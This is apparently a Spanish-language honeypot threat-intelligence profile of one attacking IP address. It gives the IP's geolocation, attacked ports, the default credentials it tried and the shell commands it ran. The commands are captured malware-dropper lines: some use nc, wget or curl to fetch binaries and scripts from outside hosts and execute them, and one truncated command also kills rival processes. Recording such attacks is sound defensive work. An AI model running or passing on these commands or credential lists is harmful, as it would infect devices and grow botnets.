Amenaza Activa • CRITICO
91.224.92.14
🎯
1434
Ataques Totales
🔌
23
Puertos
📡
7
Tipos Ataque
🦠
1
Malware
Geolocalizacion
- Pais: 🇬🇧 Reino Unido
- Ciudad: Desconocida
- ASN: AS209605
- ISP: UAB Host Baltic
Tipos de Ataque
tanner
adbhoney
honeytrap
cowrie
honeyaml
dionaea
h0neytr4p
Puertos Atacados
9090808180832280888089809010023900026016161661617555555568888300044323231800080+3
Malware Asociado
Credenciales Intentadas
🔐ubnt/ubnt 2x
🔐admin/(vacio) 1x
🔐admin/admin1234 1x
🔐telecomadmin/admintelecom 1x
🔐root/Password123! 1x
🔐default/default 1x
🔐admin/admin 1x
🔐root/Pass1234 1x
🔐root/(vacio) 1x
🔐root/default 1x
🔐root/zaq123456g 1x
🔐root/Google2015 1x
🔐root/1234 1x
🔐root/root 1x
🔐root/123456 1x
Comandos Ejecutados
$
cd /data/local/tmp/; toybox nc 91.224.92.14 9000 < /data/local/tmp > received; chmod 777 received;./received
28x
$
cd /data/local/tmp/; nc 91.224.92.14 9000 < / > received; chmod 777 received;./received
28x
$
cd /data/local/tmp/; rm -rf arm7; busybox wget http://130.12.180.20:36695/arm7; curl -O http://130.12.180.20:36695/arm7; wget http://130.12.180.20:36695/arm7.sh; curl -O http://130.12.180.20:36695/arm7; busybox wget http://130.12.180.20:36695/arm7; busybox curl -O http://130.12.180.20:36695/arm7; toybox curl -O http://130.12.180.20:36695/arm7; toybox wget http://130.12.180.20:36695/arm7; chmod 777 arm7;./arm7
13x
$
cd /data/local/tmp/; busybox wget http://130.12.180.20:36695/w.sh; sh w.sh; curl http://130.12.180.20:36695/c.sh; sh c.sh; wget http://130.12.180.20:36695/wget.sh; sh wget.sh; curl http://130.12.180.20:36695/wget.sh; sh wget.sh; busybox wget http://130.12.180.20:36695/wget.sh; sh wget.sh; busybox curl http://130.12.180.20:36695/wget.sh; sh wget.sh
12x
$
cd /data/local/tmp/; rm -rf w.sh; busybox wget http://130.12.180.20:36695/w.sh; sh w.sh; rm -rf c.sh; curl http://130.12.180.20:36695/c.sh; sh c.sh; rm -rf wget.sh; wget http://130.12.180.20:36695/wget.sh; sh wget.sh; curl http://130.12.180.20:36695/wget.sh; sh wget.sh; busybox wget http://130.12.180.20:36695/wget.sh; sh wget.sh; busybox curl http://130.12.180.20:36695/wget.sh; sh wget.sh
10x
$
cd /data/local/tmp/; rm -rf arm7; busybox wget http://130.12.180.20:36695/arm7; curl -O http://130.12.180.20:36695/arm7; wget http://130.12.180.20:36695/arm7; curl -O http://130.12.180.20:36695/arm7; busybox wget http://130.12.180.20:36695/arm7; busybox curl -O http://130.12.180.20:36695/arm7; toybox curl -O http://130.12.180.20:36695/arm7; toybox wget http://130.12.180.20:36695/arm7; chmod 777 arm7;./arm7
7x
$
cd /data/local/tmp/; rm -rf received; toybox nc 91.224.92.14 9000 < /data/local/tmp > received; chmod 777 received;./received
4x
$
cd /data/local/tmp/; rm -rf received; nc 91.224.92.14 9000 < / > received; chmod 777 received;./received
4x
$
echo SHELL_TEST
3x
$
cd /data/local/tmp/ || cd /tmp || cd /var/tmp; for p in /proc/[0-9]*; do pid=${p##*/}; [ "$pid" -le 300 ] 2>/dev/null && continue; [ "$pid" = "$$" ] && continue; [ "$pid" = "$PPID" ] && continue; exe="/proc/$pid/exe"; [ ! -e "$exe" ] && continue; ! readelf -l "$exe" 2>/dev/null | grep -q INTERP && kill -9 "$pid" 2>/dev/null; done; (wget -q -O cat.sh http://130.12.180.20:36695/cat.sh || busybox wget -q -O cat.sh http://130.12.180.20:36695/cat.sh || nc 130.12.180.20 36695 < /dev/null > cat.sh || b
3x (comando truncado en el origen)
Evaluacion de Riesgo
90/100
Bajo · Medio · Alto · Critico